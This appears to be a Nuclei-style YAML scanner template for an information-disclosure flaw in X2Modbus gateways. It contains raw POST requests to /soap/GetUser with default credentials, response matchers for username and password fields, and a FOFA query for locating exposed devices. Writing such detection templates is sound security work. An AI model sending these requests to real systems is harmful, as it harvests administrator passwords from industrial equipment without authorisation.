http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <GetUserResult>
            - <UserName>
            - <PassWord>
            - <Date>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /soap/GetUser HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded

          <GetUser><User Name="guest" Password="admin"/></GetUser>
        - |
          POST /soap/GetUser HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded

          <GetUser><User Name="admin" Password="admin"/></GetUser>
id: X2Modbus-GetUser-Information-disclosure
info:
    author: Superhero
    description: |-
        fofa: server="SunFull-Webs"
        X2Modbus GetUser 存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取网站后台系统用户密码等敏感信息，从而登录网站后台系统，使网站处于极不安全的状态。
    name: X2Modbus GetUser 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s/iu8-KodEdHUO8Jwp4wDebw
    severity: medium
    tags:
        - Information disclosure
